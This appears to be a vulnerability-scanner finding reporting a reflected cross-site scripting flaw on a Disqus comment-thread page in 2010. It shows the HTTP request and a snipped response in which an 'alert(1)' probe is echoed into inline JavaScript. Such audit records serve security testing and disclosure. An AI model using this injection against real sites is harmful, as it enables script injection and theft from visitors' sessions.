1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://engadget2.disqus |
Path: | /thread/dnp_kinect_review |
GET /thread/dnp_kinect_review Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: engadget2.disqus.com Cookie: test=1 |
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 22:26:04 GMT Server: Apache/2.2.14 (Ubuntu) Content-Language: en-us Vary: Accept-Language,Cookie X-Nonce: -:2010-11-07T17:26:04 Cache-Control: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66752 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]... = true; }; }; var comment = new function() { this.placeholder = { 'name' : "Name", 'email' : "Email", 'website' : "Website", 'textarea' : "Type your comment here.e3480;alert(1)/ }; this.submitButtonValue = 'Submit'; this.validateSubmit = function() { var message = (document.comment_form var author_email = (document ...[SNIP]... |